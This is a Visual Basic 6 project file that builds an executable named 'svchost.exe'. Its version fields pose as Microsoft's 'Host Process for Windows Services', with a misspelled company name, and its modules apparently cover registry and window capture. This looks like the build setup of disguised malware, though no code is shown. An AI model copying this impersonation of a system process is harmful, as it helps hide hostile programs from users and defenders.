Type=Exe
Form=svchost.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\Windows\SysWOW64\stdole2.tlb#OLE Automation
Module=Module1; Module1.bas
Module=registros; registros.bas
Module=Pega_Janela; Pega_Janela.bas
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="svchost"
ExeName32="svchost.exe"
Path32=".."
Command32=""
Name="svchost"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=39
AutoIncrementVer=1
ServerSupportFiles=0
VersionCompanyName="Microsoft Comporation"
VersionFileDescription="Host Process for Windows Services"
VersionLegalCopyright="2001"
VersionProductName="svchost"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0
